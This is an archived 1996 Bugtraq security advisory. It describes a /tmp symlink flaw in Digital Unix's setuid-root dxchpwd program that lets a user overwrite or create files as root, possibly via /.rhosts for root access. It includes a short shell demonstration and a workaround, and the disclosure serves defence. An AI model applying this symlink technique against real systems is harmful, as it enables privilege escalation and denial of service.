Bugtraq mailing list archives
Digital Unix v3.x (v4.x?) security vulnerability
From: augustus () mail stic net (Eric Augustus)
Date: Sun, 17 Nov 1996 00:09:38 +0000
In Digital Unix (OSF/1) v3.x, there is a security vulnerability in the /usr/tcb/bin/dxchpwd program. The dxchpwd is installed as part of the C2 security package. The dxchpwd can be used to overwrite any file, or create a file anywhere on the system causing a possible denial of service and possibly lead to root access. Background: dxchpwd is part of the C2 security package and is setuid root. It's a GUI interface for a users to change their passwds. As far as I know, all Digital Unix v3.x versions are vulnerable, and possibly 4.x. Details: When dxchpwd is run, it creates a log file /tmp/dxchpwd.log which is root owned and mode 600. If the log file doesn't exist, it can be symlinked to any existing file, or new file on the system. New files are created root owned, mode 600. Existing files retain their permissions and ownership, but their contents are overwritten. If a user then attempts to change a passwd, a message similar to the following is written to the log file: Unknown SIA Prompt: (* Permission denied. *) rendition 6 In this case, if /.rhosts were symlinked to /tmp/dxchpwd.log, then a host known as Unknown could possibly gain root access. Example: $ ls -l /usr/tcb/bin/dxchpwd -rwsr-xr-x 1 root bin 49152 Jul 25 1995 /usr/tcb/bin/dxchpwd $ ls -l /tmp/dxchpwd.log /tmp/dxchpwd.log not found $ export DISPLAY=:0 (or a remotehost) $ ln -s /hackfile /tmp/dxchpwd $ ls -l /hackfile /hackfile not found $ /usr/tcb/bin/dxchpwd (The dxchpwd window will appear. Just enter root for username and anything for the passwd. You'll get a permission denied message and the window will close.) $ ls -l /hackfile -rw------- 1 root system 0 Nov 16 22:44 /hackfile Fix: Make sure /tmp/dxchpwd.log exists, which is root owned and at least mode 600 until a patch is available. Of course, the setuid bit could be removed, but then users couldn't use it to change their passwds. Gus -- _________________________________________________________________________ Eric Augustus 1211 Saxonhill Drive San Antonio, TX 78253 (210) 679-6497 augustus () stic net _____________________ #INCLUDE <std_disclaimer.h> _______________________ You May Be an Engineer if... people groan at the party when you pick out the music
Current thread:
- Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Leshka Zakharoff (Nov 15)
- Re: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Kari E. Hurtta (Nov 17)
- Re: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Alan Brown (Nov 17)
- Digital Unix v3.x (v4.x?) security vulnerability Eric Augustus (Nov 16)
- Re: Digital Unix v3.x (v4.x?) security vulnerability hj () globecom net (Nov 17)
- Re: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Bryan Reece (Nov 17)
- Re: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Simon Karpen (Nov 17)
- Magic password of some linux-box(Hardware..) Seo Euiseong (Nov 17)
- rplayd on HPUX 10.1 Henrik P Johnson (Nov 19)
- Re: BoS: Magic password of some linux-box(Hardware..) Sergiu Popovici (Nov 19)
- Re: BoS: Magic password of some linux-box(Hardware..) Sergei A. Golubchik (Nov 19)
- Irix: root exploit for LicenseManager Yuri Volobuev (Nov 19)
- Re: BoS: Magic password of some linux-box(Hardware..) moost () xs4all nl (Nov 20)
- Ascend Killer Program Aleph One (Nov 17)
- Digital Unix v3.x (v4.x?) security vulnerability Eric Augustus (Nov 16)